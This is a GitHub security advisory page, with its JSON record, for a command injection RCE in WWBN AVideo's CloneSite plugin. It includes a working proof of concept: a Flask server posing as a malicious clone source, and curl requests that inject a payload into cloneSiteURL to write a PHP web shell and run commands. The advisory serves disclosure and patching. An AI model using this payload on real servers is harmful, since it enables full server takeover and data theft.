GHSA-XR6F-H4X7-R6QP

Vulnerability from github – Published: 2026-04-16 21:25 – Updated: 2026-04-16 21:25
VLAI?
Summary
WWBN AVideo: RCE cause by clonesite plugin
Details

Description

Summary

The cloneServer.json.php endpoint in the CloneSite plugin constructs shell commands using user-controlled input (url parameter) without proper sanitization. The input is directly concatenated into a wget command executed via exec(), allowing command injection.

An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., ;). This leads to Remote Code Execution (RCE) on the server.

Details

Inside plugin/CloneSite/cloneClient.json.php(line112) didn't have proper sanitization

$objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL));

use str_replace make ' added by escapeshellarg become so hacker can inject evil cloneSiteURL to rce

$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; \\116
$cmd = "wget -O {$sqlFile} {$sqlURL}"; \\117
exec($cmd . " 2>&1", $output, $return_val);                 \\119

The attack flow

  1. make a evil site to provide date

  2. add evil url in objects/pluginAddDataObject.json.php

  3. access plugin/CloneSite/cloneClient.json.php to trigger rce

Poc

make a evil site use python like this 

from flask import Flask, jsonify, request

app = Flask(__name__)

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
    print("PATH:", path)


    return jsonify({
            "error": False,
            "msg": "",
            "url": "http://target-site.com/",
            "key": "target_clone_key",
            "useRsync": 0,
            "videosDir": "/var/www/html/AVideo/videos/",
            "sqlFile": "Clone_mysqlDump_evil123.sql",
            "videoFiles": [],
            "photoFiles": []
        })



if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8071)

change url with payload like (need admin)

curl -b 'PHPSESSID=<admin_session>'
-X POST "http://127.0.0.1/objects/pluginAddDataObject.json.php" \
  -H "Content-Type: application/json" \
  -d '{
    "cloneSiteURL":"http://127.0.0.1:8071/;echo${IFS}\"<?=system(\\$_POST[1])?>\"${IFS}>1.php;/",
    "cloneSiteSSHIP":"127.0.0.1",
    "cloneSiteSSHUser":"1",
    "cloneSiteSSHPort":"22",
    "cloneSiteSSHPassword":{
        "type":"encrypted",
        "value":"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg=="
    },
    "useRsync":true,
    "MaintenanceMode":false,
    "myKey":"ba882541262f3202ee5a5ad790ae5b70"
}' 
#inject evil code
curl "http://127.0.0.1/plugin/CloneSite/cloneClient.json.php" #trigger rce to write 1.php
curl "http://127.0.0.1/plugin/CloneSite/1.php" 
 -d '1=id'
 #uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)

this payload is to create a web shell

then access plugin/CloneSite/cloneClient.json.php

1.phpwill be created

impact

  • Remote Code Execution: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.

  • Full server compromise: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.

Recommended Fix

add more powerful sanitization for $objClone->cloneSiteURL

Severity ?
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T21:25:19Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "Description\n\n## Summary\n\nThe `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection.\n\nAn attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to **Remote Code Execution (RCE)** on the server.\n\n## Details\n\nInside `plugin/CloneSite/cloneClient.json.php`(line112) didn\u0027t have proper sanitization\n\n```php\n$objClone-\u003ecloneSiteURL = str_replace(\"\u0027\", \u0027\u0027, escapeshellarg($objClone-\u003ecloneSiteURL));\n```\n\nuse `str_replace ` make `\u0027` added by `escapeshellarg` become ` ` so hacker can inject evil `cloneSiteURL` to rce\n\n```php\n$sqlURL = \"{$objClone-\u003ecloneSiteURL}videos/clones/{$json-\u003esqlFile}\"; \\\\116\n$cmd = \"wget -O {$sqlFile} {$sqlURL}\"; \\\\117\nexec($cmd . \" 2\u003e\u00261\", $output, $return_val);                 \\\\119\n```\n\nThe attack flow\n\n1. make a evil site to provide date\n\n2. add  evil url in `objects/pluginAddDataObject.json.php` \n\n3. access `plugin/CloneSite/cloneClient.json.php` to trigger rce\n\n   \n\n## Poc\n\nmake a evil site use python like this \n\n```python\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n@app.route(\u0027/\u0027, defaults={\u0027path\u0027: \u0027\u0027})\n@app.route(\u0027/\u003cpath:path\u003e\u0027)\ndef catch_all(path):\n    print(\"PATH:\", path)\n\n\n    return jsonify({\n            \"error\": False,\n            \"msg\": \"\",\n            \"url\": \"http://target-site.com/\",\n            \"key\": \"target_clone_key\",\n            \"useRsync\": 0,\n            \"videosDir\": \"/var/www/html/AVideo/videos/\",\n            \"sqlFile\": \"Clone_mysqlDump_evil123.sql\",\n            \"videoFiles\": [],\n            \"photoFiles\": []\n        })\n\n\n\nif __name__ == \u0027__main__\u0027:\n    app.run(host=\u00270.0.0.0\u0027, port=8071)\n```\n\nchange url with payload like (need admin)\n\n```shell\ncurl -b \u0027PHPSESSID=\u003cadmin_session\u003e\u0027\n-X POST \"http://127.0.0.1/objects/pluginAddDataObject.json.php\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"cloneSiteURL\":\"http://127.0.0.1:8071/;echo${IFS}\\\"\u003c?=system(\\\\$_POST[1])?\u003e\\\"${IFS}\u003e1.php;/\",\n    \"cloneSiteSSHIP\":\"127.0.0.1\",\n    \"cloneSiteSSHUser\":\"1\",\n    \"cloneSiteSSHPort\":\"22\",\n    \"cloneSiteSSHPassword\":{\n        \"type\":\"encrypted\",\n        \"value\":\"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg==\"\n    },\n    \"useRsync\":true,\n    \"MaintenanceMode\":false,\n    \"myKey\":\"ba882541262f3202ee5a5ad790ae5b70\"\n}\u0027 \n#inject evil code\ncurl \"http://127.0.0.1/plugin/CloneSite/cloneClient.json.php\" #trigger rce to write 1.php\ncurl \"http://127.0.0.1/plugin/CloneSite/1.php\" \n -d \u00271=id\u0027\n #uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\nthis payload is to create a web shell \n\nthen access `plugin/CloneSite/cloneClient.json.php` \n\n`1.php`will be created \n\n## impact\n\n- **Remote Code Execution**: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.\n\n- **Full server compromise**: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.\n\n## Recommended Fix\n\nadd more powerful sanitization for `$objClone-\u003ecloneSiteURL`",
  "id": "GHSA-xr6f-h4x7-r6qp",
  "modified": "2026-04-16T21:25:20Z",
  "published": "2026-04-16T21:25:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-xr6f-h4x7-r6qp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/473c609fc2defdea8b937b00e86ce88eba1f15bb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "WWBN AVideo: RCE cause by clonesite plugin"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.